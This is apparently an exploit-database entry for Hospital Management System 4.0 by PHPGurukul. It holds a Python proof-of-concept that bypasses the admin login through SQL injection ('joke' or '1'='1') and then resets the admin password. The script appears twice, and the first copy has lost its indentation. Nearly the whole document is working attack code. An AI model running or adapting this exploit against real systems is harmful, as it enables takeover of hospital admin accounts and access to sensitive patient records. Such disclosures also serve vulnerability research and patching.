# Exploit Title: Hospital Management System 4.0 - Authentication Bypass
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
# Password and username parameters have sql injection vulnerability on admin panel.
# username: joke' or '1'='1 , password: joke' or '1'='1
# Exploit changes password of admin user.



#!/usr/bin/python

import requests
import sys


if (len(sys.argv) !=2) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath"
print "[*] e.g.: PoC.py 127.0.0.1/hospital"
exit(0)

rhost = sys.argv[1]

npasswd = str(raw_input("Please enter at least six characters for new password: "))

url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}


#login

with requests.Session() as session:
lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})

#check authentication bypass

check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
print ("[*] Status code: %s"%check.status_code)

if check.status_code == 200:
print "[+] Authentication bypass was successful!"
print "[+] Trying to change password."
elif check.status_code == 404:
print "[-] One bad day! Check target web application path."
sys.exit()
else:
print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
sys.exit()

#change password

cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
if cgpasswd.status_code == 200:
print ("[+] Username is: admin")
  print ("[+] New password is: %s"%npasswd)
        else:
print "[-] One bad day! Try it manually."
sys.exit()

hospital_poc.py

#!/usr/bin/python

import requests
import sys


if (len(sys.argv) !=2) or sys.argv[1] == "-h":
	print "[*] Usage: PoC.py rhost/rpath"
	print "[*] e.g.: PoC.py 127.0.0.1/hospital"
	exit(0) 

rhost = sys.argv[1]

npasswd = str(raw_input("Please enter at least six characters for new password: "))

url = "http://"+rhost+"/hms/admin/index.php"
data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} 


#login

with requests.Session() as session:
	lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
	
	#check authentication bypass

	check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
	print ("[*] Status code: %s"%check.status_code)

	if check.status_code == 200:
		print "[+] Authentication bypass was successful!"
		print "[+] Trying to change password."
	elif check.status_code == 404:
		print "[-] One bad day! Check target web application path."
		sys.exit()
	else:
		print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
		sys.exit()
	
	#change password

	cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
	cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
	if cgpasswd.status_code == 200:
		print ("[+] Username is: admin")
  		print ("[+] New password is: %s"%npasswd)
        else:
		print "[-] One bad day! Try it manually."
		sys.exit()